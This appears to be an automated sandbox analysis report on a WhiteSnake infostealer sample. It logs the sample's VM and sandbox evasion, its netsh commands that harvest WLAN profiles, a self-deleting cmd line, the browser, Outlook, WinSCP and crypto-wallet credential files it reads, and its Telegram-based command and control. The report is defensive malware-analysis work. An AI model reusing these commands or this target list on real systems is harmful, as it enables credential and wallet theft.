Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: BA9qyj2c9G.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: BA9qyj2c9G.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: BA9qyj2c9G.exeStatic PE information: 0xE480C158 [Mon Jun 25 20:55:52 2091 UTC]
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B724BBA pushad ; retf 0_2_00007FFD9B724BC9
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B7200AD pushad ; iretd 0_2_00007FFD9B7200C1

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process information set: NOOPENFILEERRORBOX (60 identical entries)
          Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX (4 identical entries)

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Memory allocated: 118532B0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Memory allocated: 1186CB30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 600000
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 599890
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 599781
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 599672
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 599547
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 599437
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 599328
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 599218
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 599109
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 599000
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 598890
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 598778
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 598671
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 598562
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 598451
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 598341
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 598228
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 598099
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 597984
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 597875
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 597765
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 597656
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 597547
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 597437
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 597328
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 597218
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 597109
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 597000
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 596890
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 596781
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 596672
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 596562
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 596453
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 596344
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 596234
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 596125
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 596012
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 595906
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 595797
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 595687
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Thread delayed: delay time: 595566
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Window / User API: threadDelayed 3334
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Window / User API: threadDelayed 6485
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -24903104499507879s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -600000s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -599890s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -599781s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -599672s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -599547s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -599437s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -599328s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -599218s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -599109s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -599000s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -598890s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -598778s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -598671s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -598562s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -598451s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -598341s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -598228s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -598099s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -597984s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -597875s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -597765s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -597656s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -597547s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -597437s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -597328s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -597218s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -597109s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -597000s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -596890s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -596781s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -596672s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -596562s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -596453s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -596344s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -596234s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -596125s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -596012s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -595906s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -595797s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -595687s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe TID: 1448 | Thread sleep time: -595566s >= -30000s
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem (3 identical entries)
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: BA9qyj2c9G.exe | Binary or memory string: qemu'
          Source: BA9qyj2c9G.exe, 00000000.00000002.2021425648.000001186D62D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: BA9qyj2c9G.exe, c2Tj.cs | Reference to suspicious API methods: NativeMethods.OpenProcess(processAccessMask, bInheritHandle: false, process.Id)
          Source: BA9qyj2c9G.exe, nturDQ.cs | Reference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)
          Source: BA9qyj2c9G.exe, beLX.cs | Reference to suspicious API methods: GetProcAddress(qcx, r00x)
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 3
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Queries volume information: C:\Users\user\Desktop\BA9qyj2c9G.exe VolumeInformation
          Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

          Stealing of Sensitive Information

          Source: Yara match | File source: Process Memory Space: BA9qyj2c9G.exe PID: 7496, type: MEMORYSTR
          Source: Yara match | File source: 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: BA9qyj2c9G.exe PID: 7496, type: MEMORYSTR
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %AppData%\Electrum\wallets
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: >%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %exodus.conf.json;exodus.wallet\*.seco
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $%AppData%\Jaxx\Local Storage\leveldb
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %AppData%\Exodus
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: &%LocalAppData%\Coinomi\Coinomi\wallets
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Yara match | File source: Process Memory Space: BA9qyj2c9G.exe PID: 7496, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match | File source: Process Memory Space: BA9qyj2c9G.exe PID: 7496, type: MEMORYSTR
          Source: Yara match | File source: 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: BA9qyj2c9G.exe PID: 7496, type: MEMORYSTR
          MITRE ATT&CK matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). The flattened cells mark the following techniques as observed for this sample: Windows Management Instrumentation; LSASS Driver (Persistence and Privilege Escalation); Disable or Modify Tools; OS Credential Dumping; File and Directory Discovery; Archive Collected Data; Web Service; Native API; DLL Side-Loading (Persistence, Privilege Escalation and Defense Evasion); Obfuscated Files or Information; Credentials in Registry; System Information Discovery; Data from Local System; Ingress Tool Transfer; Access Token Manipulation (Privilege Escalation and Defense Evasion); Timestomp; Security Software Discovery; Email Collection; Encrypted Channel; Process Injection (Privilege Escalation and Defense Evasion); Process Discovery; Non-Standard Port; File Deletion; Virtualization/Sandbox Evasion (Defense Evasion and Discovery); Non-Application Layer Protocol; Masquerading; Application Window Discovery; Application Layer Protocol; System Network Configuration Discovery. The per-technique hit counts could not be separated from the flattened cell text.
          Behavior graph (ID 1570929; sample BA9qyj2c9G.exe; start date 08/12/2024; architecture WINDOWS; score 100). Network contacts: api.telegram.org (Uses the Telegram API (likely for C&C communication)), ip-api.com, 46.235.26.83 (ports 49732, 8080; SURFPLANET-ASDE, Germany), 147.28.185.29 (ports 49733, 80; RGNET-SEARGnetSeattleWestinEE, United States), and 5 other IPs or domains. Dropped file: C:\Users\user\AppData\...\BA9qyj2c9G.exe.log (CSV). Signatures on the sample: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus / Scanner detection for submitted sample; 10 other signatures. Signatures on the BA9qyj2c9G.exe process: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 5 other signatures. Process tree: BA9qyj2c9G.exe started three cmd.exe instances; the first two each started netsh.exe, conhost.exe and 2 other processes, the third started conhost.exe, timeout.exe and chcp.com. Signatures on cmd.exe: Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords.

          Antivirus detection (Source | Detection | Scanner | Label):
          BA9qyj2c9G.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.WhiteSnake
          BA9qyj2c9G.exe | 67% | Virustotal |
          BA9qyj2c9G.exe | 100% | Avira | HEUR/AGEN.1307453
          BA9qyj2c9G.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
          ip-api.com | 208.95.112.1 | true | false | | high
          api.telegram.org | 149.154.167.220 | true | false | | high
          URLs (Name | Malicious | Antivirus Detection | Reputation):
          http://ip-api.com/line?fields=query,country | false | | high
